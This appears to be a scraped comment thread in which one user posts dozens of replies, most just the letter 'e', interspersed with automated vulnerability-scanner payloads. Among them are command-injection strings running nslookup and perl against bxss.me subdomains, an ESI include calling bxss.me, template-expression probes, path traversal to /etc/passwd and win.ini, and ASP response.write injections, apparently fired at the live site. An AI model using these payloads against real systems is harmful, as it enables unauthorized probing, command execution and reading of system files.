xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


${9999753+9999348}

xhat007 (1) - 2 years ago - Reply 0


xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e<esi:include src="http://bxss.me/rpb.png"/>

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


;(nslookup hitpflixrwcamfae53.bxss.me||perl -e "gethostbyname('hitpflixrwcamfae53.bxss.me')")|(nslookup hitpflixrwcamfae53.bxss.me||perl -e "gethostbyname('hitpflixrwcamfae53.bxss.me')")&(nslookup hitpflixrwcamfae53.bxss.me||perl -e "gethostbyname('hitpflixrwcamfae53.bxss.me')")

xhat007 (1) - 2 years ago - Reply 0


(nslookup hitopvyntpuuwbc4c4.bxss.me||perl -e "gethostbyname('hitopvyntpuuwbc4c4.bxss.me')")

xhat007 (1) - 2 years ago - Reply 0


|(nslookup hittagwtzjmei2b9c5.bxss.me||perl -e "gethostbyname('hittagwtzjmei2b9c5.bxss.me')")

xhat007 (1) - 2 years ago - Reply 0


&(nslookup hitpcvweydnywb6d46.bxss.me||perl -e "gethostbyname('hitpcvweydnywb6d46.bxss.me')")&'\"

0&(nslookup hitpcvweydnywb6d46.bxss.me||perl -e "gethostbyname('hitpcvweydnywb6d46.bxss.me')")&
'

xhat007 (1) - 2 years ago - Reply 0


$(nslookup hitminusntdpt5f5d2.bxss.me||perl -e "gethostbyname('hitminusntdpt5f5d2.bxss.me')")

xhat007 (1) - 2 years ago - Reply 0


(nslookup hitdzmfukflsx1b7f6.bxss.me||perl -e "gethostbyname('hitdzmfukflsx1b7f6.bxss.me')")

xhat007 (1) - 2 years ago - Reply 0


|echo rxjdiw$()\ kdhxhc\nz^xyu||a #' |echo rxjdiw$()\ kdhxhc\nz^xyu||a #|" |echo rxjdiw$()\ kdhxhc\nz^xyu||a #

xhat007 (1) - 2 years ago - Reply 0


&echo adqshj$()\ oehqtx\nz^xyu||a #' &echo adqshj$()\ oehqtx\nz^xyu||a #|" &echo adqshj$()\ oehqtx\nz^xyu||a #

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


echo olsjkr$()\ eornbr\nz^xyu||a #' &echo olsjkr$()\ eornbr\nz^xyu||a #|" &echo olsjkr$()\ eornbr\nz^xyu||a #

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


../e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


../../../../../../../../../../../../../../windows/win.ini

xhat007 (1) - 2 years ago - Reply 0


../../../../../../../../../../../../../../etc/passwd

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


response.write(9530168*9367310)

xhat007 (1) - 2 years ago - Reply 0


'+response.write(9530168*9367310)+'

xhat007 (1) - 2 years ago - Reply 0


"+response.write(9530168*9367310)+"

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


vGdnNUBN

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0


1KAb7kGtO

xhat007 (1) - 2 years ago - Reply 0


e

xhat007 (1) - 2 years ago - Reply 0